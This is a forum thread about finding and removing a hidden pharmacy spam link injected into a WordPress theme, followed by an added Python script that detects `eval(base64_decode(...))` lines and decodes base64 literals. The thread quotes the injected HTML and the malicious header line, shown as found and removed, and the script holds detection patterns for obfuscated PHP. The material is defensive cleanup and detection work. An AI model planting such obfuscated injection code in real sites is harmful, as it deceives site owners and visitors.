
WordPress hidden spam

  • 09-05-2009 8:22pm
    #1
    Registered Users Posts: 2,267 ✭✭✭


    I have a site done using WordPress. I noticed the word cialis when looking at webmaster tools. When I checked the source code there was a spam link.

    [HTML]<body>
    <div id="begin_template"><a href="[link was here]">Generic Cialis</a></div><script language="javascript">
    document.getElementById("begin_template").style.display="none";
    </script><div class="wrapper">
    <div class="menu">[/HTML]

    I have checked all the files in the theme and cannot find this link anywhere. Any pointers on where I will find it?
    I have the permissions on the files set to 644 so not sure how this happened either.

    Thanks.


Comments

  • Closed Accounts Posts: 1,200 ✭✭✭louie


    Probably in the footer of the template - could be encoded text or a comment.


  • Registered Users Posts: 2,267 ✭✭✭kc66


    It's not the footer. It's short and I have double-checked it.


  • Registered Users Posts: 2,267 ✭✭✭kc66


    I eventually found this in the db table wp_options. Deleted it but it has come back again.


  • Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Is there a file called theme_licence.php or start_template.php with encrypted code in it?

    I had the same problem with one recently and the encrypted code contained the spam, which was then called as a function and pasted inside my header. You wouldn't see it unless you highlighted the page, as the text was white on a white header background.


  • Registered Users Posts: 2,267 ✭✭✭kc66


    I compared these 2 files to the original theme files and they are the exact same. So no extra code in either. Unless they are part of the theme which I doubt, then this is not the problem.


  • Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Was the code in those files encrypted or not?
    Did you check index.php and see what the first div tag called in is? From the code you put, this is the first thing after the <body> tag.
    Check the functions file as well and see what functions it has. Maybe post the contents of that here or a link to your URL.


  • Registered Users Posts: 2,267 ✭✭✭kc66


    I think I found it. There was an extra piece of code in the header that wasn't in the original theme file:

    [PHP]<meta http-equiv="Content-Type" content="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />[/PHP]

    In the theme file I originally had:

    [PHP]<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />[/PHP]

    After it was removed the spam link has not come back so hopefully this is it.


  • Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    That's what I said to you earlier, to look for theme_license and see was there encrypted code in it.
    eval(base64_decode) is a function used to decrypt it and put that link in the header.
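
The check this thread converged on (compare the installed theme file with the original copy and look for `eval(base64_decode(...))`), written out as an added example that is not part of any post above. The two header lines are the ones quoted by kc66; the contents of `theme_licence.php`, the payload and all function names are constructed assumptions.

```python
import base64
import difflib
import re

# eval() fed directly by a decoder call; PHP function names are case-insensitive.
EVAL_DECODE = re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
# A quoted string literal that looks like base64 (24+ characters).
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{24,}={0,2})["']""")

def find_eval_decode(php_source):
    """Return (line_number, line) for every line that evals decoded data."""
    return [(n, line.strip()) for n, line in enumerate(php_source.splitlines(), 1)
            if EVAL_DECODE.search(line)]

def added_lines(pristine, installed):
    """Lines present in the installed file but not in the original theme copy."""
    diff = difflib.unified_diff(pristine.splitlines(), installed.splitlines(), lineterm="", n=0)
    return [d[1:].strip() for d in diff if d.startswith("+") and not d.startswith("+++")]

def decode_literals(php_source):
    """Decode base64 string literals for reading only; nothing is executed."""
    decoded = []
    for match in B64_LITERAL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # not valid base64 after all
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded

# Header line from the original theme, as quoted in the thread.
PRISTINE_HEADER = """<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />"""
# Header line found on the affected site, as quoted in the thread.
INSTALLED_HEADER = """<meta http-equiv="Content-Type" content="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />"""
# Constructed stand-in for theme_licence.php: the thread never shows the file,
# so the assignment to $f1 and the payload below are assumptions.
PAYLOAD = "echo '<div id=\"begin_template\">[link was here]</div>';"
LICENCE_FILE = '<?php $f1 = "%s"; ?>' % base64.b64encode(PAYLOAD.encode()).decode()

if __name__ == "__main__":
    for number, line in find_eval_decode(INSTALLED_HEADER):
        print("eval of decoded data on line %d: %s" % (number, line))
    for line in added_lines(PRISTINE_HEADER, INSTALLED_HEADER):
        print("not in original theme: %s" % line)
    for text in decode_literals(LICENCE_FILE):
        print("decoded literal: %s" % text)
```

Reading whole theme files from disk and passing their contents to these functions covers every template, not just the header; a post above also reports the link reappearing from the `wp_options` table, which a file scan does not cover.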

